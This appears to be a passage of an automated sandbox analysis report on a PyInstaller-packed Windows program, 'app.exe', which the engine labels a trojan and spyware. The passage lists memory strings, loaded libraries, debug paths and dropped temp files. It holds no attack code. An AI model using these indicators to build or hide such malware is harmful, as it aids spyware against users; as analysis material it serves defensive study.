    Source: app.exe, 00000000.00000003.2043932736.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2071451960.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ha vs app.exe
    Source: app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2038853805.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs app.exe
    Source: app.exe, 00000000.00000003.2040089170.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2041521665.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2039012355.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs app.exe
    Source: app.exe, 00000000.00000003.2040240547.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2042831387.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2041226515.0000022254577000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_win32sysloader.pyd0 vs app.exe
    Source: app.exe, 00000000.00000003.2041102002.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2044094725.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2041817197.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2042128630.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_asyncio.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2044162437.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2042499534.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2044856644.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2044345299.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2041445729.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2071085160.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs app.exe
    Source: app.exe, 00000000.00000003.2041296869.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2044009957.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs app.exe
    Source: app.exe, 00000000.00000003.2042037638.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs app.exe
    Source: app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs app.exe
    Source: app.exeBinary or memory string: OriginalFilename vs app.exe
    Source: app.exe, 00000002.00000002.3291411057.00007FF8B8B44000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3291312517.00007FF8B8B2C000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3290896624.00007FF8B7E2C000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3287399981.00007FF8A8809000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs app.exe
    Source: app.exe, 00000002.00000002.3291910910.00007FF8B93DC000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3288536168.00007FF8A8F38000.00000002.00000001.01000000.00000012.sdmpBinary or memory string: OriginalFilenamelibsslH vs app.exe
    Source: app.exe, 00000002.00000002.3291709592.00007FF8B8F7A000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3290764335.00007FF8B7E05000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenamepywintypes38.dll0 vs app.exe
    Source: app.exe, 00000002.00000002.3291010342.00007FF8B7E5D000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3292329649.00007FF8BA4F6000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3285756922.00007FF8A7FEB000.00000002.00000001.01000000.00000028.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3286009707.00007FF8A8128000.00000002.00000001.01000000.00000023.sdmpBinary or memory string: OriginalFilenamemsvcp140.dllT vs app.exe
    Source: app.exe, 00000002.00000002.3289109628.00007FF8B055E000.00000002.00000001.01000000.00000026.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3287802597.00007FF8A8C1F000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython38.dll. vs app.exe
    Source: app.exe, 00000002.00000002.3291509455.00007FF8B8C19000.00000002.00000001.01000000.00000024.sdmpBinary or memory string: OriginalFilenamevcruntime140_1.dllT vs app.exe
    Source: app.exe, 00000002.00000002.3288973772.00007FF8A938C000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs app.exe
    Source: app.exe, 00000002.00000002.3291809676.00007FF8B8F93000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs app.exe
    Source: app.exe, 00000002.00000002.3292188786.00007FF8BA253000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dll^ vs app.exe
    Source: app.exe, 00000002.00000002.3292009008.00007FF8B9846000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs app.exe
    Source: classification engineClassification label: mal56.troj.spyw.winEXE@3/196@0/1
    Source: C:\Users\user\Desktop\app.exeCode function: 0_2_00007FF7ACE87420 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF7ACE87420
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80AA6F0 GetDiskFreeSpaceExW,_invalid_parameter_noinfo_noreturn,2_2_00007FF8A80AA6F0
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282Jump to behavior
    Source: app.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\app.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\Desktop\app.exeFile read: C:\Users\user\Desktop\app.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"
    Source: C:\Users\user\Desktop\app.exeProcess created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"
    Source: C:\Users\user\Desktop\app.exeProcess created: C:\Users\user\Desktop\app.exe "C:\Users\user\Desktop\app.exe"Jump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: libffi-7.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: libcrypto-1_1.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: libssl-1_1.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: libopenblas.fb5ae2tyxyh2ijrdkgdgq3xbklktf43h.gfortran-win_amd64.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\app.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
    Source: app.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: app.exeStatic file information: File size 27056395 > 1048576
    Source: app.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: app.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: app.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: app.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: app.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: app.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: app.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
    Source: app.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: app.exe, 00000000.00000003.2044009957.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: app.exe, 00000000.00000003.2044240662.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291253287.00007FF8B8B24000.00000002.00000001.01000000.0000000C.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_asyncio.pdb source: app.exe, 00000000.00000003.2039112212.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_multiprocessing.pdb source: app.exe, 00000000.00000003.2040760491.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_ssl.pdb source: app.exe, 00000002.00000002.3290821663.00007FF8B7E1D000.00000002.00000001.01000000.00000011.sdmp
    Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: app.exe, 00000000.00000003.2041668057.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: app.exe, 00000000.00000003.2040994788.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291768707.00007FF8B8F89000.00000002.00000001.01000000.00000009.sdmp
    Source: Binary string: ucrtbase.pdb source: app.exe, 00000002.00000002.3288925159.00007FF8A9351000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: app.exe, 00000000.00000003.2042220965.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: app.exe, 00000000.00000003.2041445729.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: app.exe, 00000000.00000003.2040510826.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291669459.00007FF8B8F75000.00000002.00000001.01000000.0000000F.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb source: app.exe, 00000002.00000002.3290723067.00007FF8B7DF1000.00000002.00000001.01000000.00000013.sdmp
    Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: app.exe, 00000000.00000003.2043073708.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
    Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: app.exe, 00000000.00000003.2043836755.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\_overlapped.pdb source: app.exe, 00000000.00000003.2040843489.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: app.exe, 00000000.00000003.2044345299.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: app.exe, 00000002.00000002.3291871307.00007FF8B93D1000.00000002.00000001.01000000.00000007.sdmp
    Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: app.exe, 00000000.00000003.2041888729.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.0.dr
    Source: Binary string: p.win-amd64-3.8\Release\_win32sysloader.pdb source: app.exe, 00000000.00000003.2041226515.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: app.exe, 00000000.00000003.2043495149.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.0.dr
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: app.exe, 00000000.00000003.2039012355.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291470377.00007FF8B8C15000.00000002.00000001.01000000.00000024.sdmp
    Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: app.exe, 00000000.00000003.2042910662.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: app.exe, 00000000.00000003.2039557201.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291372022.00007FF8B8B3E000.00000002.00000001.01000000.0000000B.sdmp
    Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: app.exe, 00000000.00000003.2043753016.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_queue.pdb source: app.exe, 00000000.00000003.2040922322.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291968105.00007FF8B9843000.00000002.00000001.01000000.0000000E.sdmp
    Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: app.exe, 00000000.00000003.2041521665.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: vcruntime140.amd64.pdbGCTL source: app.exe, 00000000.00000003.2038853805.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3292106073.00007FF8BA24E000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: app.exe, 00000000.00000003.2042499534.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\win32pdh.pdb source: win32pdh.pyd.0.dr
    Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: app.exe, 00000000.00000003.2041296869.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: app.exe, 00000000.00000003.2041595247.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: app.exe, 00000000.00000003.2043659043.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.0.dr
    Source: Binary string: C:\A\6\b\libssl-1_1.pdb source: app.exe, 00000002.00000002.3288474877.00007FF8A8F03000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: app.exe, 00000000.00000003.2070807041.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3292285552.00007FF8BA4F3000.00000002.00000001.01000000.0000000A.sdmp, select.pyd.0.dr
    Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: app.exe, 00000000.00000003.2042670052.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.0.dr
    Source: Binary string: ucrtbase.pdbUGP source: app.exe, 00000002.00000002.3288925159.00007FF8A9351000.00000002.00000001.01000000.00000004.sdmp
    Source: Binary string: vcruntime140.amd64.pdb source: app.exe, 00000000.00000003.2038853805.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3292106073.00007FF8BA24E000.00000002.00000001.01000000.00000006.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: app.exe, 00000000.00000003.2039012355.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291470377.00007FF8B8C15000.00000002.00000001.01000000.00000024.sdmp
    Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: app.exe, 00000000.00000003.2044637351.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\pyexpat.pdb source: app.exe, 00000002.00000002.3290963193.00007FF8B7E52000.00000002.00000001.01000000.0000000D.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: app.exe, 00000002.00000002.3285964356.00007FF8A80F6000.00000002.00000001.01000000.00000023.sdmp, MSVCP140.dll.0.dr
    Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: app.exe, 00000000.00000003.2041817197.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\pywintypes.pdb** source: app.exe, 00000002.00000002.3290723067.00007FF8B7DF1000.00000002.00000001.01000000.00000013.sdmp
    Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdbGCTL source: app.exe, 00000002.00000002.3285964356.00007FF8A80F6000.00000002.00000001.01000000.00000023.sdmp, MSVCP140.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\python3.pdb source: app.exe, 00000000.00000003.2069050493.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: app.exe, 00000000.00000003.2042990999.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\6\b\libssl-1_1.pdb?? source: app.exe, 00000002.00000002.3288474877.00007FF8A8F03000.00000002.00000001.01000000.00000012.sdmp
    Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: app.exe, 00000000.00000003.2042415024.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: app.exe, 00000000.00000003.2041370917.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1d 10 Sep 2019built on: Mon Sep 16 11:00:37 2019 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: app.exe, 00000002.00000002.3287213051.00007FF8A8713000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: app.exe, 00000000.00000003.2043573928.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: app.exe, 00000002.00000002.3287588669.00007FF8A8B0D000.00000002.00000001.01000000.00000005.sdmp, python38.dll.0.dr
    Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: app.exe, 00000000.00000003.2040612222.0000022254569000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3291253287.00007FF8B8B24000.00000002.00000001.01000000.0000000C.sdmp
    Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: app.exe, 00000000.00000003.2044094725.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.0.dr
    Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: app.exe, 00000000.00000003.2042128630.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.0.dr
    Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: app.exe, 00000000.00000003.2042580638.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.0.dr
    Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: app.exe, 00000000.00000003.2042333645.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: app.exe, 00000000.00000003.2044856644.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_decimal.pdb source: app.exe, 00000002.00000002.3289036482.00007FF8B054D000.00000002.00000001.01000000.00000026.sdmp
    Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: app.exe, 00000000.00000003.2042754649.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: app.exe, 00000000.00000003.2043165569.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: app.exe, 00000000.00000003.2042831387.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: app.exe, 00000000.00000003.2041742051.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_elementtree.pdb source: app.exe, 00000000.00000003.2040387217.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: app.exe, 00000000.00000003.2044162437.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.0.dr
    Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: app.exe, 00000000.00000003.2042037638.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\_decimal.pdb## source: app.exe, 00000002.00000002.3289036482.00007FF8B054D000.00000002.00000001.01000000.00000026.sdmp
    Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: app.exe, 00000000.00000003.2041962953.0000022254569000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.0.dr
    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: app.exe, 00000002.00000002.3287213051.00007FF8A8713000.00000002.00000001.01000000.00000010.sdmp
    Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: app.exe, 00000000.00000003.2071451960.0000022254572000.00000004.00000020.00020000.00000000.sdmp, app.exe, 00000002.00000002.3285578905.00007FF8A7FE5000.00000002.00000001.01000000.00000028.sdmp
    Source: Binary string: C:\src\pywin32\build\temp.win-amd64-3.8\Release\win32api.pdb source: win32api.pyd.0.dr
    Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: app.exe, 00000000.00000003.2043932736.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: app.exe, 00000000.00000003.2044508949.0000022254569000.00000004.00000020.00020000.00000000.sdmp
    Source: app.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: app.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: app.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: app.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: app.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: VCRUNTIME140_1.dll.0.drStatic PE information: 0xD234ED7D [Fri Oct 3 02:27:09 2081 UTC]
    Source: app.exeStatic PE information: section name: _RDATA
    Source: libcrypto-1_1.dll.0.drStatic PE information: section name: .00cfg
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: section name: .xdata
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: section name: /4
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: section name: /19
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: section name: /31
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: section name: /45
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: section name: /57
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: section name: /70
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: section name: /81
    Source: libopenblas.FB5AE2TYXYH2IJRDKGDGQ3XBKLKTF43H.gfortran-win_amd64.dll.0.drStatic PE information: section name: /92
    Source: libssl-1_1.dll.0.drStatic PE information: section name: .00cfg
    Source: C:\Users\user\Desktop\app.exeCode function: 2_2_00007FF8A80DD5EA push rdx; retf 2_2_00007FF8A80DD5EB
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\Crypto\Cipher\_raw_des.pydJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
    Source: C:\Users\user\Desktop\app.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI22282\bcrypt\_bcrypt.pydJump to dropped file
